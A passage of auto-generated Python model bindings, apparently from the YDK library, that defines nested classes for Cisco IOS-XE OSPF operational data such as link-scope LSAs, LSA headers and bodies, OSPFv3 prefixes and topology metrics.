super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): """ OSPFv3 links .. attribute:: interface_id (key) Interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_interface_id (key) Neighbor interface ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: neighbor_router_id (key) Neighbor router ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: metric Metric **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): """ OSPFv3 prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): """ OSPFv3 intra\-area prefix\-list .. attribute:: prefix (key) Prefix **type**\: str **config**\: False .. attribute:: prefix_options Prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class LinkScopeLsas(Entity): """ List OSPF link scope LSA .. attribute:: lsa_type (key) OSPF link scope LSA type **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_scope_lsa List of OSPF link scope LSAs **type**\: list of :py:class:`LinkScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa>` **config**\: False .. attribute:: area_scope_lsa List OSPF area scope LSA databases **type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, self).__init__() self.yang_name = "link-scope-lsas" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.link_scope_lsa = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas, ['lsa_type'], name, value) class LinkScopeLsa(Entity): """ List of OSPF link scope LSAs .. attribute:: lsa_id (key) LSA ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: adv_router (key) Advertising router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: decoded_completed The OSPF LSA body is fully decoded **type**\: bool **config**\: False .. attribute:: raw_data The complete LSA in network byte order as received/sent over the wire **type**\: list of int **range:** 0..255 **config**\: False .. attribute:: version Version **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ospfv2_lsa OSPFv2 LSA **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa>` **config**\: False .. attribute:: ospfv2_link OSPFv2 LSA link **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link>` **config**\: False .. attribute:: ospfv2_topology Summary LSA **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology>` **config**\: False .. attribute:: ospfv2_external External LSA **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External>` **config**\: False .. attribute:: ospfv2_unknown_tlv OSPFv2 Unknown TLV **type**\: list of :py:class:`Ospfv2UnknownTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv>` **config**\: False .. attribute:: ospfv3_lsa_val OSPFv3 LSA **type**\: :py:class:`Ospfv3LsaVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal>` **config**\: False .. attribute:: ospfv3_link OSPFv3 links **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link>` **config**\: False .. attribute:: ospfv3_prefix_list OSPFv3 prefix\-list **type**\: list of :py:class:`Ospfv3PrefixList <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList>` **config**\: False .. attribute:: ospfv3_ia_prefix OSPFv3 intra\-area prefix\-list **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix>` **config**\: False .. attribute:: multi_topology OSPF multi\-topology interface augmentation **type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology>` **config**\: False .. attribute:: router_address Router address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: tlv Link TLV **type**\: :py:class:`Tlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv>` **config**\: False .. attribute:: unknown_sub_tlv OSPFv2 Unknown sub TLV **type**\: list of :py:class:`UnknownSubTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, self).__init__() self.yang_name = "link-scope-lsa" self.yang_parent_name = "link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_id','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.UnknownSubTlv))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ('version', (YLeaf(YType.uint32, 'version'), ['int'])), ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])), ]) self.lsa_id = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.version = None self.router_address = None self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal() self.ospfv3_lsa_val.parent = self self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val" self.tlv = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Tlv() self.tlv.parent = self self._children_name_map["tlv"] = "tlv" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv2_unknown_tlv = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix_list = YList(self) self.ospfv3_ia_prefix = YList(self) self.multi_topology = YList(self) self.unknown_sub_tlv = YList(self) self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value) class Ospfv2Lsa(Entity): """ OSPFv2 LSA .. attribute:: header Decoded OSPFv2 LSA header data **type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header>` **config**\: False .. attribute:: lsa_body Decoded OSPFv2 LSA body data **type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv2 LSA header data .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: opaque_type Opaque type **type**\: int **range:** 0..255 **config**\: False .. attribute:: opaque_id Opaque ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False .. attribute:: flag_options LSA options **type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): """ Decoded OSPFv2 LSA body data .. attribute:: num_of_links Number of links **type**\: int **range:** 0..65535 **config**\: False .. attribute:: network Network details **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network>` **config**\: False .. attribute:: summary_mask Summary mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_mask External mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: body_flag_options LSA body flags **type**\: :py:class:`Ospfv2LsaBodyFlagsOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaBodyFlagsOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): """ Network details .. attribute:: network_mask IP network mask **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): """ OSPFv2 LSA link .. attribute:: link_id (key) Link ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: link_data (key) Link data **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: type Link type **type**\: int **range:** 0..255 **config**\: False .. attribute:: ospfv2_topology Topology specific information **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): """ Topology specific information .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): """ Summary LSA .. attribute:: mt_id (key) MT\-ID for topology enabled link **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: metric Metric for the topology **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = 